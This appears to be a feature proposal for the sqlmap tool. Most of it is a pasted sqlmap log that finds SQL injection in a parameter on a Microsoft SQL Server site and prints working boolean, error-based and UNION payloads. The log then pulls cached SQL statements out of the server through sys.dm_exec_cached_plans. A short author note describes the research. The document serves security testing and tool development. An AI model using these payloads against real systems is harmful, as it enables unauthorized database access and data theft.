[11:52:35] [WARNING] detected ambiguity (mnemonic 'ign' can be resolved to: 'ignore-401', 'ignore-proxy'). Resolved to shortest of those ('ignore-401')
_
___ ___| |_____ ___ ___ {1.0-dev-03f32ae}
|_ -| . | | | .'| . |
|___|_ |_|_|_|_|__,| _|
|_| |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 11:52:35
[11:52:35] [INFO] flushing session file
[11:52:35] [INFO] testing connection to the target URL
[11:52:35] [INFO] heuristics detected web page charset 'ascii'
[11:52:35] [INFO] testing if the target URL is stable. This can take a couple of seconds
[11:52:36] [INFO] target URL is stable
[11:52:36] [INFO] testing if GET parameter 'id' is dynamic
[11:52:36] [INFO] confirming that GET parameter 'id' is dynamic
[11:52:36] [INFO] GET parameter 'id' is dynamic
[11:52:36] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'Microsoft SQL Server')
[11:52:36] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n] Y
[11:52:36] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[11:52:36] [INFO] GET parameter 'id' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[11:52:36] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[11:52:36] [INFO] GET parameter 'id' is 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' injectable
[11:52:36] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[11:52:36] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[11:52:36] [WARNING] reflective value(s) found and filtering out
[11:52:36] [INFO] ORDER BY technique seems to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[11:52:36] [INFO] target URL appears to have 3 columns in query
[11:52:36] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection points with a total of 15 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1 AND 8545=8545
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: id=1 AND 3918=CONVERT(INT,(SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113)+(SELECT (CASE WHEN (3918=3918) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(122)+CHAR(113)))
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT CHAR(113)+CHAR(118)+CHAR(118)+CHAR(98)+CHAR(113)+CHAR(121)+CHAR(89)+CHAR(117)+CHAR(118)+CHAR(87)+CHAR(79)+CHAR(122)+CHAR(85)+CHAR(87)+CHAR(115)+CHAR(113)+CHAR(118)+CHAR(107)+CHAR(122)+CHAR(113),NULL,NULL--
---
[11:52:36] [INFO] testing Microsoft SQL Server
[11:52:37] [INFO] confirming Microsoft SQL Server
[11:52:37] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows XP
web application technology: ASP, Microsoft IIS 5.1
back-end DBMS: Microsoft SQL Server 2005
[11:52:37] [INFO] fetching SQL SELECT statement query output: 'SELECT st.text from sys.dm_exec_cached_plans cp cross apply sys.dm_exec_sql_text(cp.plan_handle) st'
[11:52:37] [INFO] the SQL query used returns 1341 entries
[11:52:37] [INFO] retrieved: "\\r\\ncreate+view+sys.dm_exec_cached_plans+as+select+*+from+OpenRowset(TABLE+SYSDMEXECCACHEDPLANS)\\r\\n"
[11:52:37] [INFO] retrieved: "(@1+smallint)SELECT+*+FROM+[users]+WHERE+[id]=@1"
[11:52:37] [INFO] retrieved: "(@1+tinyint)SELECT+*+FROM+[users]+WHERE+[id]=@1+AND+host_name()=host_name()"
[11:52:37] [INFO] retrieved: "(@1+tinyint)SELECT+*+FROM+[users]+WHERE+[id]=@1+AND+host_name()=host_name()"
[11:52:37] [INFO] retrieved: "(@1+tinyint)SELECT+*+FROM+[users]+WHERE+[id]=@1+AND+host_name()=host_name()"
[11:52:37] [INFO] retrieved: "(@1+tinyint)SELECT+*+FROM+[users]+WHERE+[id]=@1+ORDER+BY+(1)+ASC"
[11:52:37] [INFO] retrieved: "(@1+tinyint)SELECT+*+FROM+[users]+WHERE+[id]=@1+ORDER+BY+(3)+ASC"
[11:52:37] [INFO] retrieved: "(@1+tinyint,@2+int,@3+int)SELECT+*+FROM+[users]+WHERE+[id]=@1+AND+square(@2)=square(@3)"
[11:52:38] [INFO] retrieved: "CREATE+FUNCTION+sys.dm_exec_sql_text(@handle+varbinary(64))\\r\\nRETURNS+TABLE\\r\\nAS\\r\\n\\tRETURN+SELECT+*+FROM+OPENROWSET(TABLE+FNGETSQL,+@handle)\\r\\n"
[11:52:38] [INFO] retrieved: "CREATE+VIEW+sys.syscharsets+AS\\r\\n\\tSELECT+type,+id,+csid,\\r\\n\\t\\tconvert(smallint,+0)+AS+status,\\r\\n\\t\\tname,+description,\\r\\n\\t\\tconvert(varbinary(6000),+null)+AS+binarydefinition,\\r\\n\...
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR0000000000000002."
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR0000000000000004."
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR0000000000000006."
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR0000000000000007."
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR0000000000000008."
[11:52:38] [INFO] retrieved: "FETCH+API_CURSOR000000000000000B."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR000000000000000C."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR000000000000000D."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR000000000000000E."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR000000000000000F."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR0000000000000010."
[11:52:39] [INFO] retrieved: "FETCH+API_CURSOR0000000000000012."
[11:52:40] [INFO] retrieved: "FETCH+API_CURSOR0000000000000014."
[11:52:40] [INFO] retrieved: "FETCH+API_CURSOR0000000000000015."
[11:52:40] [INFO] retrieved: "FETCH+API_CURSOR0000000000000016."
[11:52:40] [INFO] retrieved: "FETCH+API_CURSOR000000000000001B."
...
dodek
Hi, I recently did a little research into ways to extract the SQL statement that the webpage is trying to run via SQL injection and thought it might be a cool feature to add to sqlmap. I published the research here if you want to take a quick look.
http://www.contextis.com/resources/blog/sql-inception-how-select-yourself/
The basic idea was to try and make blind SQL injection less blind especially with larger more complicated SQL statements and also to help with manual testing too. Also it can be interesting to just see the SQL that the website is running and viewing the other SQL statements in the cache can help figure out how the app works.
Feel free to use this in any way you like :)
Thanks, Aaron